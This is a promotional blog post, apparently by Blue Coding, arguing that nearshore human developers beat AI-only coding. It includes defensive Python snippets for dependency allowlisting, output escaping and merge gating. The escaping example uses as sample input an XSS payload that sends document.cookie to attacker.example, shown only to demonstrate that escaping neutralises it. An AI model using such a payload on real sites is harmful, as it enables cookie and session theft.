AI-powered coding assistants are fast, but they don’t replace the strategic decision-making and risk management that human developers bring. Learn why nearshore teams working in your time zone consistently outperform AI-only approaches.

Building software in 2025 means working with two powerful levers: nearshore engineering teams that extend your in-house capacity with real-time collaboration, and AI tools that accelerate individual tasks. Both have changed how products ship. Yet when the bar is reliability, security, and business fit rather than speed alone, human developers (especially well-run nearshore teams) consistently deliver stronger outcomes than AI automation on its own. Here’s the pragmatic, tech-first view of why.

AI assistants are excellent at producing output such as stubs, tests, refactors, and snippets that unblock momentum. But products win on outcomes: fewer production incidents, faster onboarding of new teammates, cleaner domain models, and a codebase you can scale and audit. Experienced engineers excel at turning fuzzy business constraints into crisp technical decisions. They negotiate trade-offs such as performance versus readability, scope versus time to market, and cash cost versus cloud cost in ways an automated tool cannot consistently do. Nearshore teams amplify this advantage by staying in your time zone and culture band, which reduces feedback latency on those decisions and keeps the “product story” intact from discovery to delivery.

AI speeds up local tasks, while nearshore collaboration compresses system-wide cycle time. When your product manager, designer, and engineers can meet in normal working hours, a week’s worth of misalignment shrinks into a single afternoon. That’s hard to replicate with asynchronous prompts and handoffs. Nearshore proximity keeps ceremonies such as standups, incident reviews, and backlog refinement actionable rather than performative, because decisions close in minutes instead of waiting out a day-long lag.

Current practice is clear on two points. First, AI pair programmers can significantly speed up certain tasks. Second, unreviewed AI-generated code can introduce security weaknesses and subtle flaws that are expensive to detect later.

AI can deliver sizable time savings on bounded problems such as writing an HTTP server or boilerplate tests. But in the wild, those same tools sometimes suggest patterns that propagate defects or “invent” packages and APIs that don’t exist. That’s not a knockout blow against AI, but it is a reminder that expert human review remains non-negotiable.
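One lightweight guardrail against invented packages is to check every dependency an assistant proposes against a list your team has already vetted, before it ever reaches a lockfile. The sketch below assumes a plain `requirements.txt`-style list and a hypothetical in-code allowlist (`APPROVED_PACKAGES`); a real pipeline would more likely consult an internal package mirror. Names are normalized the way PEP 503 describes, so `Foo_Bar` and `foo-bar` compare equal.

```python
import re

# Hypothetical allowlist of packages the team has already vetted (PEP 503-normalized).
APPROVED_PACKAGES = {"requests", "pydantic", "sqlalchemy"}


def normalize(name: str) -> str:
    """PEP 503 normalization: collapse runs of -, _ and . into '-' and lowercase."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_requirement_names(lines):
    """Extract bare package names from requirements.txt-style lines."""
    names = []
    for line in lines:
        line = line.split("#", 1)[0].strip()  # drop comments and surrounding whitespace
        if not line:
            continue
        # The name ends at the first version specifier, extras bracket, or marker.
        match = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
        if match:
            names.append(normalize(match.group(0)))
    return names


def unapproved_dependencies(lines, approved=APPROVED_PACKAGES):
    """Return proposed packages that are not on the vetted list."""
    return [name for name in parse_requirement_names(lines) if name not in approved]


if __name__ == "__main__":
    proposed = ["requests>=2.31", "pydantic==2.7.0", "hypothetical-fastjson  # suggested by assistant"]
    print(unapproved_dependencies(proposed))  # ['hypothetical-fastjson']
```

Anything this check flags is not automatically malicious; it simply routes the suggestion to a human who can confirm the package exists and is trustworthy.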

The risk profile is evolving, too. Recent experience points to AI-specific failure modes such as prompt injection, insecure output handling, adversarial instructions, and data-poisoning feedback loops. These are not theoretical: they show up in code and infrastructure templates today, which means your development lifecycle needs controls that treat AI-touched code as requiring extra scrutiny.
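Insecure output handling usually means passing model output straight into a shell, a query, or a web page. A minimal sketch of the defensive habit, assuming the output is rendered into HTML: treat it like any other untrusted user input and escape it before it reaches the template. `render_assistant_reply` is a hypothetical helper, not part of any framework; it uses only the standard library’s `html.escape`.

```python
import html


def render_assistant_reply(model_output: str) -> str:
    """Wrap untrusted model output in a paragraph, escaping HTML metacharacters."""
    # html.escape converts &, < and >, plus both quote characters when quote=True,
    # so injected markup is displayed as text instead of being executed by the browser.
    safe = html.escape(model_output, quote=True)
    return '<p class="assistant">' + safe + "</p>"


if __name__ == "__main__":
    reply = 'Done! <script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    print(render_assistant_reply(reply))
```

Escaping only covers the HTML context; output headed for a shell or a database needs its own safeguards, such as argument lists instead of shell strings and parameterized queries.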

The most durable software delivery models are converging on human-in-the-loop engineering: engineers orchestrate, constrain, and correct AI agents rather than trying to replace engineering judgment wholesale. Frameworks emerging across the industry wire AI into planning and implementation while keeping humans accountable for decomposition, guardrails, and acceptance. Nearshore teams working your hours keep this loop tight: prompt → generate → review → refine → merge, all in a single session with context shared live.

The payoff is practical: AI handles the “grunt work,” and humans handle requirements volatility, architecture, and risk, which is exactly where experience compounds value.

As adversaries adopt generative tooling, the attack surface shifts. AI lowers the barrier to crafting polymorphic malware, reverse-engineering mobile clients, and exploiting integration seams. That makes secure design reviews, threat modeling, and defensive coding patterns even more critical, and these are human strengths backed by team processes, not one-shot generations. The same assistance that speeds up development also accelerates attacker workflows. Mature teams counter by baking security into the pipeline through dependency policies, automated checks, and human review at risk checkpoints. Nearshore teams make those checkpoints more effective because they can take part in live incident simulations and post-mortems without time-zone drag.

Yes, AI can make a single developer faster. But organizations ship outcomes through coordinated teams and predictable cadences. Speedups exist, but the time saved can be absorbed by reviewing AI-generated code and fixing silent errors, especially for less-experienced engineers. Senior developers extract the most benefit because they know what to ask for, what to ignore, and where the edge cases hide. That advantage compounds inside a nearshore model because seniors can supervise and pair in your daytime, keeping quality high while capturing the speed.

From SOC 2 and HIPAA to financial controls, auditors care about process evidence: who reviewed what, which risk was accepted by whom, and how test coverage links to user stories. Humans write the RFCs, run the approvals, and trace requirements through to deployed artifacts. AI can draft the documents and even map tests to stories, but accountability lines must be human and traceable. Nearshore teams that share your working day make change control rituals smoother and keep paper trails complete without delaying delivery.
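The link between tests and user stories is one piece of that evidence that can be checked automatically. A small sketch, assuming tests are tagged with story IDs (the `STORY-101` format and the dictionary shape are hypothetical conventions, not a standard): it reports stories that no test covers and tests that point at unknown stories, so gaps surface during review rather than during an audit.

```python
def traceability_report(stories, test_tags):
    """Map each user story to the tests that claim to verify it.

    stories:   iterable of story IDs from the backlog, e.g. "STORY-101"
    test_tags: dict of test name -> list of story IDs that test verifies
    Returns (coverage, untested_stories, orphan_tests).
    """
    coverage = {story: [] for story in stories}
    orphans = []
    for test_name, story_ids in test_tags.items():
        linked = False
        for story_id in story_ids:
            if story_id in coverage:
                coverage[story_id].append(test_name)
                linked = True
        if not linked:
            orphans.append(test_name)  # test references no known story
    untested = sorted(story for story, tests in coverage.items() if not tests)
    return coverage, untested, sorted(orphans)


if __name__ == "__main__":
    stories = ["STORY-101", "STORY-102", "STORY-103"]
    test_tags = {
        "test_login_locks_after_failures": ["STORY-101"],
        "test_export_csv": ["STORY-102", "STORY-101"],
        "test_legacy_banner": ["STORY-099"],
    }
    coverage, untested, orphans = traceability_report(stories, test_tags)
    print("untested stories:", untested)  # untested stories: ['STORY-103']
    print("orphan tests:", orphans)  # orphan tests: ['test_legacy_banner']
```

The report is only as good as the tags; a human still decides whether a linked test actually exercises the story it claims to cover.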

It’s tempting to argue that AI is “free” once you’ve paid for licenses. In reality, the total cost of ownership includes:

↝ Extra review time for AI-generated code, especially in regulated or safety-critical systems

↝ Tooling to detect AI-specific risks like prompt-injection filters, output sanitization, and policy enforcement

↝ Rework from subtle defects or invented dependencies that slip through

Nearshore teams bring cost control through throughput and reduced miscommunication. Every avoided rework sprint is money back in the budget. And because collaboration is real time, fewer “explainers,” fewer unnecessary tickets, and fewer calendar gaps show up on your burndown.

When production wobbles at 10:00, you want engineers who can chase anomalies across services, reason about partial failures, and coordinate a rollback. AI can assist with log summarization and hypothesis generation, but incident command is a human discipline. Blameless culture, live debugging, and clear communication restore trust. Nearshore alignment ensures the right people are awake, on a call, and able to act without shifting incidents into the graveyard slot where attention is lowest.

Post-incident, humans improve guardrails such as better health checks, idempotent jobs, circuit breakers, and service-level objectives tied to user experience, not just system metrics. AI can suggest patterns, but the choice of which pattern to adopt comes from context and experience.
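To make one of those guardrails concrete, here is a minimal, single-threaded circuit breaker sketch. It assumes a consecutive-failure threshold and a fixed cool-down; `CircuitBreaker`, `CircuitOpenError`, and their parameters are illustrative names, and production libraries add thread safety, half-open probe limits, and metrics. The clock is injectable so the behaviour can be tested without sleeping.

```python
import time
from typing import Callable, Optional, TypeVar

T = TypeVar("T")


class CircuitOpenError(RuntimeError):
    """Raised when a call is rejected because the circuit is open."""


class CircuitBreaker:
    def __init__(self, failure_threshold: int = 3, reset_timeout: float = 30.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.failure_threshold = failure_threshold
        self.reset_timeout = reset_timeout  # seconds to wait before a trial call
        self.clock = clock
        self.failures = 0
        self.opened_at: Optional[float] = None

    @property
    def state(self) -> str:
        if self.opened_at is None:
            return "closed"
        if self.clock() - self.opened_at >= self.reset_timeout:
            return "half-open"  # cool-down elapsed: let a trial call through
        return "open"

    def call(self, fn: Callable[[], T]) -> T:
        if self.state == "open":
            raise CircuitOpenError("dependency marked unhealthy; failing fast")
        try:
            result = fn()
        except Exception:
            self.failures += 1
            # Trip on reaching the threshold, or re-open if a half-open trial fails.
            if self.failures >= self.failure_threshold or self.opened_at is not None:
                self.opened_at = self.clock()
            raise
        # Any success closes the circuit and clears the failure count.
        self.failures = 0
        self.opened_at = None
        return result
```

Failing fast while the circuit is open keeps one struggling dependency from dragging every caller into timeouts, and the cool-down decides when it is worth probing again.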

Here’s how modern teams blend the two to win more sprints than they lose:

↝ Discovery: Humans run interviews, map value streams, and define fitness functions. AI helps summarize, cluster feedback, and outline test plans

↝ Design: Humans decide architecture and boundaries while AI drafts documents, proposes reference implementations, and generates design diagrams for review

↝ Build: AI accelerates boilerplate, transforms tests, and suggests refactors while humans enforce patterns, integrate across services, and handle complex data migrations

↝ Security: Humans own threat models and sign-offs while AI augments with static analysis, dependency diffs, and policy checks

↝ Operate: Humans run incident command and capacity planning while AI accelerates triage and root cause analysis drafting

AI belongs in your stack. The sweet spots:

↝ Generating scaffolds and repetitive variations like migrations, adapters, typed DTOs, and CRUD views

↝ Translating across languages and frameworks such as from legacy Java to modern Kotlin or from Python scripts to typed modules

↝ Suggesting test cases that humans then harden, deduplicate, and wire to business scenarios

↝ Drafting documentation and developer guides that humans edit for truth and tone

Guardrails matter. Treat AI as a junior pair who writes fast but needs guidance. Run security scanners and policy checks on AI output before it merges. Require human approvals for merges touching sensitive paths. And prefer nearshore pairing sessions to reduce back-and-forth: a senior can shape prompts live, inspect the diffs, and keep the branch moving.
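The sensitive-paths rule is easy to express as a pre-merge check. A sketch, assuming a hypothetical list of path patterns and that your CI can supply the changed files and the names of human approvers; hosted platforms offer comparable controls natively (for example, required code-owner reviews), so treat this as an illustration of the policy rather than a replacement for them.

```python
from fnmatch import fnmatchcase

# Hypothetical patterns for code that must never merge on AI output alone.
SENSITIVE_PATTERNS = ["src/auth/*", "src/payments/*", "infra/*.tf", ".github/workflows/*"]


def sensitive_changes(changed_files, patterns=SENSITIVE_PATTERNS):
    """Return changed files matching any sensitive pattern.

    fnmatch's '*' also matches '/', so 'src/auth/*' covers nested files too.
    """
    return [f for f in changed_files if any(fnmatchcase(f, p) for p in patterns)]


def merge_allowed(changed_files, human_approvers, required_approvals=1):
    """Block merges that touch sensitive paths without enough distinct human approvals."""
    if not sensitive_changes(changed_files):
        return True, "no sensitive paths touched"
    if len(set(human_approvers)) >= required_approvals:
        return True, "sensitive paths approved by a human reviewer"
    return False, "sensitive paths require human approval before merge"


if __name__ == "__main__":
    print(merge_allowed(["src/auth/session.py", "README.md"], human_approvers=[]))
    # (False, 'sensitive paths require human approval before merge')
```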



It’s not that humans type faster. It’s that humans:

↝ Carry mental models across the whole system and the whole business

↝ Recognize weak signals such as a funky latency bump after deploy or a vague stakeholder concern and convert them into concrete risks to mitigate

↝ Choose good defaults in ambiguous spaces: retry semantics, failure domains, data retention, and error budgets

↝ Teach: they upskill juniors, spread idioms, and build a culture that outlasts any single tool
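Error budgets show how a human-chosen default turns into simple arithmetic. For an availability SLO of 99.9% over a 30-day window, the budget is (1 − 0.999) × 30 × 24 × 60 = 43.2 minutes of allowed unavailability. A sketch, assuming an availability-style SLO over a fixed window; the function names are illustrative:

```python
def error_budget_minutes(slo: float, window_days: int = 30) -> float:
    """Minutes of allowed unavailability for an availability SLO such as 0.999."""
    if not 0.0 < slo < 1.0:
        raise ValueError("slo must be strictly between 0 and 1")
    return (1.0 - slo) * window_days * 24 * 60


def budget_remaining(slo: float, downtime_minutes: float, window_days: int = 30) -> float:
    """Fraction of the error budget still unspent (negative means overspent)."""
    budget = error_budget_minutes(slo, window_days)
    return (budget - downtime_minutes) / budget


if __name__ == "__main__":
    print(round(error_budget_minutes(0.999), 1))  # 43.2
    print(round(budget_remaining(0.999, downtime_minutes=21.6), 2))  # 0.5
```

The code only does the arithmetic; choosing the target, and deciding what the team does when the remaining budget runs low, is still the judgment call.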

Nearshore makes these advantages available in your day, not in the middle of the night. It gives you the human power of high-context decisions plus the AI power of fast iteration without trading away quality, safety, or accountability.

The difference between good and great software lies not in speed, but in how effectively it supports a company’s growth for the long run. While AI can accelerate certain tasks, our nearshore developers bring the judgment, adaptability, and collaboration that automated tools can’t replicate. By working in your time zone and culture, we ensure that every project stays aligned, secure, and built to scale. If you’re ready to combine the speed of automation with the strength of human expertise, contact us today and let’s explore how Blue Coding can power your next project.
